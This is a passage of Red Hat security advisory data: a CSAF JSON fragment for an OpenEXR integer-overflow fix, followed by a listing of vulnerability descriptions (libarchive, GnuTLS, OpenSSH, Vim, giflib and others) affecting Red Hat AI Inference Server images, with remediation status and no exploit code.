"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-20T04:01:45+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.src",
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.src",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:8872"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.src",
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.src",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.src",
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.src",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
}
]
}
RHSA-2026:16008
Vulnerability from csaf_redhat - Published: 2026-05-11 14:12 - Updated: 2026-05-14 22:36A flaw was found in libxslt package. Processing web content may disclose sensitive information. This issue was addressed with improved memory handling.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 | — |
Vendor Fix
fix
|
A flaw was found in GnuTLS. This vulnerability allows a denial of service (DoS) by excessive CPU (Central Processing Unit) and memory consumption via specially crafted malicious certificates containing a large number of name constraints and subject alternative names (SANs).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 | — |
Vendor Fix
fix
|
A flaw was found in the OpenSSH GSSAPI (Generic Security Service Application Program Interface) delta patches, as included in various Linux distributions. A remote attacker could exploit this by sending an unexpected GSSAPI message type during the key exchange process. This occurs because the `sshpkt_disconnect()` function, when called on an error, does not properly terminate the process, leading to the continued execution of the program with uninitialized connection variables. Accessing these uninitialized variables can lead to undefined behavior, potentially resulting in information disclosure or a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was identified in the RAR5 archive decompression logic of the libarchive library, specifically within the archive_read_data() processing path. When a specially crafted RAR5 archive is processed, the decompression routine may enter a state where internal logic prevents forward progress. This condition results in an infinite loop that continuously consumes CPU resources. Because the archive passes checksum validation and appears structurally valid, affected applications cannot detect the issue before processing. This can allow attackers to cause persistent denial-of-service conditions in services that automatically process archives.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in libarchive. This heap out-of-bounds read vulnerability exists in the RAR archive processing logic due to improper validation of the LZSS sliding window size after transitions between compression methods. A remote attacker can exploit this by providing a specially crafted RAR archive, leading to the disclosure of sensitive heap memory information without requiring authentication or user interaction.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Python. The `webbrowser.open()` API, used to launch web browsers, does not properly sanitize input. This allows a remote attacker to craft a malicious URL containing leading dashes. When such a URL is opened, certain web browsers may interpret these dashes as command-line options, which could lead to unexpected behavior, information disclosure, or potentially arbitrary code execution, impacting the integrity of the system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in libarchive. On 32-bit systems, an integer overflow vulnerability exists in the zisofs block pointer allocation logic. A remote attacker can exploit this by providing a specially crafted ISO9660 image, which can lead to a heap buffer overflow. This could potentially allow for arbitrary code execution on the affected system.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vulnerability occurs in the JPEG image loader due to improper validation of color component counts when processing a specially crafted JPEG image. A remote attacker can exploit this flaw without user interaction, for example, via thumbnail generation. Successful exploitation leads to application crashes and denial of service (DoS) conditions.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in giflib. This double-free vulnerability, caused by a shallow copy in GifMakeSavedImage and incorrect error handling, may allow an attacker to corrupt memory. While difficult to trigger, successful exploitation could potentially lead to arbitrary code execution or a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in Vim, an open source, command line text editor. This heap buffer overflow vulnerability exists in the tag file resolution logic when processing the 'helpfile' option. A local user could exploit this by providing a specially crafted 'helpfile' option value, leading to a heap buffer overflow. This could result in arbitrary code execution or a denial of service.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 | — |
Vendor Fix
fix
Workaround
|
A flaw was found in nghttp2. Due to missing internal state validation, the library continues to process incoming data even after a session has been terminated. A remote attacker could exploit this by sending a specially crafted HTTP/2 frame, leading to an assertion failure and a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:3a2527c5c164fad4d2f0fbda199dcd887e5acaf211fe3cd12dc3aa9f499836c0_arm64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat AI Inference Server 3.3:registry.redhat.io/rhaiis/model-opt-cuda-rhel9@sha256:b4b70c6ac64d7bc7e967165945867e5b8f9026d3b12bfbcf28bf0fb73fcc57fd_amd64 | — |
Vendor Fix
fix
|
A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
